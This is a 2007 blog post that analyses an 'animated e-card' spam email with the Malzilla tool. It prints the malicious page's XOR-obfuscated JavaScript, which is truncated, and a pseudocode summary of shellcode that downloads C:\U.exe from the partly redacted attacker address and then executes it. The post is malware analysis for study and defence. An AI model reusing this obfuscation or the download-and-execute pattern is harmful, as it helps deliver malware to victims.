Copenhagen, Helsinki, Porvoo, Lappeenranta, Tampere… my beautiful vacation is ended. Back home again with some mails/forums/newspapers/blogs to read. My hotmail mailbox contains some unwanted mails, more than in the past. I gave it a look. From all the mails I choose one entitled “animated e-card” because there are some blogs talking about this kind of mail. They all explain what’s behind this simple e-card mail, in this post I’m going to write almost the same thing showing you how to find out the hidden code using an interesting tool named Malzilla, written by Boban Spasic. It’s a nice tool, easy to use. The examples posted on the Malzilla’s web page are really helpful.
Let’s start, the mail’s body is:
“Good day.
Your Friend has sent you animated e-card from greet2k.com.
Click on your animated e-card link below:
http://68.80.xxx.32/
Copyright (c) 1991-2007 greet2k.com All Rights Reserved“
There should be something at that address. To check it I used Malzilla. Put the address in the url box and hit GET button. Here is what I got:
“Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <ahref=”/ecard.exe”>click here</a> to launch the download.<Script Language=’JavaScript’> function xor_str(plain_str, xor_key){var xored_str = “”; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^plain_str.charCodeAt(i)); return xored_str; } var plain_str =”\xe5\xc8\xcf\xc8<<<many chars here>>>x88\x89\xfb\xe5″; var xored_str = xor_str(plain_str, 197); document.write(xored_str);</script>“
The result is composed by two parts, a text which is displayed in the browser and a script. The text contains a link to a recent malware recognized by almost all the antivirus companies. If you click on the link you’ll download a malicious file… it’s always the same story but many users continue to click on this kind of link, weird.
The other part is the script. It’s not really readable in this form. First of all, as suggested in the Malzilla’s help page, I sent the script to the decoder using ‘Send script to decoder’ button. In the Decode tab there is a button name “Format text”, it can be used to format the script but it doesn’t produce a perfect indentation btw. Anyway, “Run script” reveals an interesting result:
I cut some bytes from the result replacing with ‘…’.
Ok, what’s that? Hm, look at the end of the embed src text: “9.wmv”, wmv stands for Windows Media Video. Looks like an exploitation. A quick search on internet provides the answer to the “what’s that” question, this is an exploit for a vulnerability in Windows Media Player plug-in. In this case the shellcode (the %xx sequence inside ’s+=unescape’ string) contains some code able to download a file. Here is a picture taken from Malzilla which shows part of the shellcode’s bytes:
It’s easy to recognize some strings in it: urlmon.dll, C:\U.exe and the http address. The hidden code is something like:
LoadLibrary(“urlmon.dll”);
UrlDownloadToFileA(…, “http://68.80.xxx.32/file.php”, “C:\U.exe”, …, …)
WinExec(“C:\U.exe”, …)
ExitProcess
The shellcode is used to download and execute a file. When the malicious file has been executed the shellcode ends and you are infected.
Don’t know if this file and the ecard.exe are the same, I’m not interested in it now. I just wanted to give a try to Malzilla, an interesting tool for sure. Thanks to Boban.
That’s all!
August 28, 2007 at 7:50 pm
Great post man! ;)